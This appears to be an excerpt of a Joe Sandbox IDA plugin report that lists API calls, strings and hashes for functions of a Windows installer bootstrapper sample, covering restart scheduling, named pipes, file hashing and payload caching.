                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-2832335422
                                                                                                                                                                                                                                                                                                  • Opcode ID: d4ac4697db82bb434d01644dbdaf3ba7075cb27ff0eb9c727740fa9f440da174
                                                                                                                                                                                                                                                                                                  • Instruction ID: d0715035520fab61a1f06e4f1b670b01eb9dc2af54f9f5946ac6ace445ac94ef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ac4697db82bb434d01644dbdaf3ba7075cb27ff0eb9c727740fa9f440da174
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAC1D271A4061ABFDB25EF28CC91E6A77A9FF08714B054129F915EB342DB70EC409BE1
                                                                                                                                                                                                                                                                                                  Function 008645EE Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 141sleepshutdownCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00864617
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0086461E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00864628
                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00864678
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00864682
                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 008646C6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008646D0
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0086470C
                                                                                                                                                                                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0086471D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00864727
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0086477D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                                                                                                                                                                                  • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2241679041-1583736410
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ea1019423ef493d120688077e77fa5064fd75ce590d24339fe5435a11720bfc
                                                                                                                                                                                                                                                                                                  • Instruction ID: f73fa0a118f7569906cd84ac166d578f0c871215380f0acf8d719cd0474122ff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea1019423ef493d120688077e77fa5064fd75ce590d24339fe5435a11720bfc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0412B73A4073AABF7215BA59C46F6F7A68FB02751F131125FE10F7681E7658C0086E1
                                                                                                                                                                                                                                                                                                  Function 00874EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00874F0D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,0086452F,?), ref: 00874F16
                                                                                                                                                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0086452F,?), ref: 00874FB8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?), ref: 00874FC5
                                                                                                                                                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0086452F), ref: 00875040
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0086452F,?), ref: 0087504B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0086452F,?), ref: 0087508B
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,0086452F,?), ref: 008750B9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create the security descriptor for the connection event and pipe., xrefs: 00874F44
                                                                                                                                                                                                                                                                                                  • Failed to allocate full name of pipe: %ls, xrefs: 00874F84
                                                                                                                                                                                                                                                                                                  • Failed to allocate full name of cache pipe: %ls, xrefs: 00875022
                                                                                                                                                                                                                                                                                                  • \\.\pipe\%ls.Cache, xrefs: 0087500C
                                                                                                                                                                                                                                                                                                  • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00874F08
                                                                                                                                                                                                                                                                                                  • pipe.cpp, xrefs: 00874F3A, 00874FE9, 0087506F
                                                                                                                                                                                                                                                                                                  • Failed to create pipe: %ls, xrefs: 00874FF6, 0087507C
                                                                                                                                                                                                                                                                                                  • \\.\pipe\%ls, xrefs: 00874F6E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                                                                                                                                                                                                  • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1214480349-3253666091
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ec6ece96d9714a2ba7c122879f128cab7d7be9cbc83a26389c2db53a9ad4f85
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f6d1301a3013ef36b3565028b8a96c8ec210a01fc9986bb0217d2d93e1d2045
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ec6ece96d9714a2ba7c122879f128cab7d7be9cbc83a26389c2db53a9ad4f85
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351C332D40A26BBEB219BA88C47FDEBB64FF04720F114121FD14F6291D7B59E409AD1
                                                                                                                                                                                                                                                                                                  Function 0089FA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00879F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 0089FAC7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FAD1
                                                                                                                                                                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 0089FB0E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FB18
                                                                                                                                                                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 0089FB5F
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0089FB83
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FB8D
                                                                                                                                                                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0089FBCA
                                                                                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0089FBE1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FBFC
                                                                                                                                                                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0089FC34
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FC3E
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0089FC77
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FC85
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                                                                                                                                                  • String ID: cryputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3955742341-2185294990
                                                                                                                                                                                                                                                                                                  • Opcode ID: d712505dd669ed2c82a9aef2125a7922b85fa5c316d87bec864c9ca3b2b55725
                                                                                                                                                                                                                                                                                                  • Instruction ID: 329cdeee038e3d7c223fa07c01817acef6f337c749887c54244ccf6752dd8b6a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d712505dd669ed2c82a9aef2125a7922b85fa5c316d87bec864c9ca3b2b55725
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD51D437D40239ABEB359E558C15BDB7AA4FB04761F0540B5BF48FA141E3B49D808AE0
                                                                                                                                                                                                                                                                                                  Function 00879E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • moving, xrefs: 0087A029
                                                                                                                                                                                                                                                                                                  • Failed to create unverified path., xrefs: 00879F6E
                                                                                                                                                                                                                                                                                                  • copying, xrefs: 0087A030, 0087A038
                                                                                                                                                                                                                                                                                                  • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00879FCB
                                                                                                                                                                                                                                                                                                  • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00879FF1
                                                                                                                                                                                                                                                                                                  • Failed to get cached path for package with cache id: %ls, xrefs: 00879EC8
                                                                                                                                                                                                                                                                                                  • Failed to concat complete cached path., xrefs: 00879EF4
                                                                                                                                                                                                                                                                                                  • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00879FA4
                                                                                                                                                                                                                                                                                                  • Failed to move verified file to complete payload path: %ls, xrefs: 0087A06C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1289240508
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5ebee2c1259a4335e0375c44ee261b6ba7662eba8e4475656055dbea388aead8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 58a4f47c75f081d37a060e8549daedb96640c998fa78e51a205014eb632e0018
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ebee2c1259a4335e0375c44ee261b6ba7662eba8e4475656055dbea388aead8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51518D3294051AFBDF226A98CC46FED7B76FF15310F108051F904F52A5E776CAA0AB82
                                                                                                                                                                                                                                                                                                  Function 008662AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 008662F8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866302
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastVersion
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 305913169-1971907631
                                                                                                                                                                                                                                                                                                  • Opcode ID: c020b92a022dbfdec53acebf64de9ea121a96aa3dbc3b9d8ed70b5ccf9ce84fb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0109432e5b342750628b232f7251fad17db019e5a76180d3c1a78238f777314d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c020b92a022dbfdec53acebf64de9ea121a96aa3dbc3b9d8ed70b5ccf9ce84fb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F641C571A0026CABDB209B59CC46EEF7FB8FB46724F01015AF505E7341EA319E50CB95
                                                                                                                                                                                                                                                                                                  Function 00879B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00879BF2
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00879C19
                                                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00879C79
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00879C84
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00863D40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863D53
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: *.*$.unverified
                                                                                                                                                                                                                                                                                                  • API String ID: 457978746-2528915496
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fc720fed2cc5268e96cd97ded88379dc916adc5eb73247022d5aeebfc1ad6ca
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe41c26830f7d609398747e5b06df29be9ad93f1b7560939a84ba56a88f375e7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fc720fed2cc5268e96cd97ded88379dc916adc5eb73247022d5aeebfc1ad6ca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23416D3090052CAEDF22AB64DD49BEAB7B8FF84311F4041E1E948E10A5EB75DEC49F15
                                                                                                                                                                                                                                                                                                  Function 008A887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008A88D0
                                                                                                                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008A88E2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 008A892D
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 008A88AA
                                                                                                                                                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008A88B9
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 008A88A0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1772835396-1985132828
                                                                                                                                                                                                                                                                                                  • Opcode ID: bd6d247d16dfe2aa98124feb8f1ee462eced70acd2291a35e8e43ad57a03da9f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 371386dc3edf501c3fb7368fd650ca9a869de22b14d7833025a61d8805d160bc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd6d247d16dfe2aa98124feb8f1ee462eced70acd2291a35e8e43ad57a03da9f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B921F8A6900128EAEB60DBA9DC05FBFB3FCFB4D711F04455AB955D2180E738AA80D771
                                                                                                                                                                                                                                                                                                  Function 0089AA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                                  • Opcode ID: 333197f08404b13b0d17c05a929555e60909366d4e7b4b2729701829cdd21949
                                                                                                                                                                                                                                                                                                  • Instruction ID: 51c47c3703c92cc604c679fc5e4d1ca5449a8feba2f4c0138fec635a4dc19570
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 333197f08404b13b0d17c05a929555e60909366d4e7b4b2729701829cdd21949
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AC21971E046288FDF25EE289E447EAB7B5FB84315F1941EAD40DE7240E774AE818F81
                                                                                                                                                                                                                                                                                                  Function 008661DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2054405381-1522884404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 182768c3e5d2e6cae0ced54d9625b87775d8583946cc85ce8edbe360f2ac2217
                                                                                                                                                                                                                                                                                                  • Instruction ID: c2fb315637acdc9b6f96b13200605e2226d2bfa3a270b67f8abad7352608a958
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 182768c3e5d2e6cae0ced54d9625b87775d8583946cc85ce8edbe360f2ac2217
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4301D632A0172967D721AB58DC46EAB77A8FF01720F010255FC14F7341EA749E544BE1
                                                                                                                                                                                                                                                                                                  Function 0089FE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,008A04F4,?,?,?,?,00000001), ref: 0089FE40
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008A04F4,?,?,?,?,00000001,?,00865616,?,?,00000000,?,?,00865395,00000002), ref: 0089FE4C
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,008A04F4,?,?,?,?,00000001,?,00865616,?,?), ref: 0089FEB5
